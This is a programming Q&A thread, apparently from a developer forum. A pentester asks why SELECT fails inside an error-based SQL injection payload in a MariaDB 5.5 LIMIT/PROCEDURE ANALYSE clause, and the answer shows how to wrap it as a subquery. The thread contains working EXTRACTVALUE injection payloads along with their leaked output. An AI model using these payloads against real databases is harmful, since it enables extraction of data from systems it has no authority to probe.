# MariaDB 5.5.65 sql injection

Tags: sql, mariadb, sql-injection, procedure

i am pentester and i am testing error-based sql injection in limit clause on my MariaDB 5.5.65 server. There is some trouble.

```
MariaDB> select * from tables where 1=1 limit 1,1 procedure analyse(EXTRACTVALUE(1370,CONCAT(0x5c,0x716a6a6b71,select '123',0x7178627171)),1);
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'select '123',0x7178627171)),1)' at line 1
MariaDB> select * from tables where 1=1 limit 1,1 procedure analyse(EXTRACTVALUE(1370,CONCAT(0x5c,0x716a6a6b71,'123',0x7178627171)),1);
ERROR 1105 (HY000): XPATH syntax error: '\qjjkq123qxbqq'
MariaDB> select * from tables where 1=1 limit 1,1 procedure analyse(EXTRACTVALUE(1370,CONCAT(0x5c,0x716a6a6b71,database(),0x7178627171)),1);
ERROR 1105 (HY000): XPATH syntax error: '\qjjkqinformation_schemaqxbqq'
```

I can retrieve information like database() and version(), but can't use select. Is this feature of MariaDB? Can i bypass this or it's impossible to use select in procedure analyse in MariaDB server?

Comment: As someone testing SQL injection, you need to learn the difference between functional and procedural contexts... You can't just jam procedural statements into places where only expressions (including function calls) are usable.

Comment: mysql does not have the `procedure` clause at all, therefore your question does not apply to mysql.

Comment: @Shadow: https://dev.mysql.com/doc/refman/5.6/en/procedure-analyse.html but yeah it's been deprecated in 5.7 and removed in 8.0. MariaDB 5.5 is outdated so it's still there.

Answer (score 0):

If you want to use select to return a scalar value in an expression, you have to put it in parentheses to make it a scalar subquery:

```
EXTRACTVALUE(1370,CONCAT(0x5c,0x716a6a6b71,select '123',0x7178627171))
```

Should be:

```
EXTRACTVALUE(1370,CONCAT(0x5c,0x716a6a6b71,(select '123'),0x7178627171))
```

In this example, that still results in an XPATH error, but that's independent of the question you asked.